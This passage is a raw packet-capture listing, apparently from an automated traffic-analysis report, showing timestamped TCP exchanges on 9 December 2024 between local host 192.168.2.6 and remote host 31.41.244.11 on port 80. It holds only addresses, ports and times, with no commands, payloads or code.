                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.388354063 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.388433933 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.388478994 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.389261961 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.389312983 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.389329910 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.389378071 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.390011072 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.390047073 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.390050888 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.390089989 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.390880108 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.390924931 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.390955925 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.390990973 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.391763926 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.391814947 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.391870022 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.391911030 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.392642021 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.392680883 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.392693996 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.392729998 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.393539906 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.393580914 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.393599987 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.393637896 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.394332886 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.394372940 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.394485950 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.394531012 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.395252943 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.395298958 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.395319939 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.395359039 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.396148920 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.396193981 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.396228075 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.396271944 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.396982908 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.397025108 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.397079945 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.397125959 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.397836924 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.397886992 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.397936106 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.397978067 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.398776054 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.398821115 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.398876905 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.398917913 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.399602890 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.399614096 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.399647951 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.399676085 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.400579929 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.400624990 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.400707960 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.400753021 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.401324987 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.401371002 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.401397943 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.401443958 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.402158022 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.402204990 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.402271986 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.402318001 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.403002977 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.403043985 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.550896883 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.550908089 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.550945044 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.551065922 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.551093102 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.551105022 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.551136971 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.551871061 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.551913977 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.551979065 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.552020073 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.552772999 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.552819967 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.552820921 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.552864075 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.553608894 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.553678036 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.553687096 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.553725004 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.554532051 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.554635048 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.554657936 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.554702997 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.555442095 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.555483103 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.555569887 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.555608034 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.556195974 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.556236982 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.556297064 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.556337118 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.557125092 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.557163000 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.557204008 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.557961941 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.558013916 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.558033943 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.558079958 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.558868885 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.558916092 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.559084892 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.559161901 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.559705019 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.559751034 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.559756041 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.559798002 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.560688972 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.560734034 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.560753107 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.560796022 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.561491013 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.561719894 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.561765909 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.562350988 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.562397003 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.562427044 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.562473059 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.563239098 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.563282967 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.563431025 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.563476086 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.563990116 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.564033985 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.564063072 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.564106941 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.564867020 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.565004110 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.565068007 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.565817118 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.565862894 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.565893888 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.565937996 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.566855907 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.566901922 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.566920996 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.566963911 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.567677975 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.567723036 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.567929983 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.567974091 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.568381071 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.568428040 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.568578959 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.568624973 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.569247961 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.569408894 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.569453955 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.570050001 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.570095062 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.570183039 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.570228100 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.570923090 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.570965052 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.571068048 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.571113110 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.571830034 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.571877003 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.571988106 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.572031021 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.572688103 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.572729111 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.572731018 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.572773933 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.573561907 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.573693991 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.573741913 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.574453115 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.574498892 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.574521065 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.574564934 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.575293064 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.575335979 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.575440884 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.575484037 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.576133013 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.576176882 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.576323032 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.576366901 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.577027082 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.577106953 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.577153921 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.577902079 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.577950001 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.577977896 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.578023911 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.578762054 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.578805923 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.578883886 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.578933001 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.579622984 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.579672098 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.579699039 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.579745054 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.580677032 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.580722094 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.580801010 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.580846071 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.581428051 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.581577063 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.581620932 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.582287073 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.582330942 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.582453966 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.582495928 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.583173037 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.583220005 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.583257914 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.583301067 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.583976030 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.584021091 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.584208965 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.584256887 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.584811926 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.584856987 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.584949017 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.584994078 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.585699081 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.585792065 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.585835934 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.586559057 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.586606979 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.586649895 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.586694956 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.587424994 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.587471008 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.587482929 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.587524891 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.588305950 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.588349104 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.588510990 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.588557959 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.589169025 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.589328051 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.589371920 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.590063095 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.590106964 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.590159893 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.590204000 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.591005087 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.591069937 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.591268063 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.591316938 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.591778994 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.591823101 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.591845036 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.591895103 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.592628956 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.592673063 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.592700005 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.592742920 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.593511105 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.593660116 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.593704939 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.594413996 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.594463110 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.594511986 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.594553947 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.595216990 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.595262051 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.595355034 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.595398903 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.596123934 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.596168041 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.743316889 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.743393898 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.743489027 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.743691921 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.743745089 CET4987480192.168.2.631.41.244.11
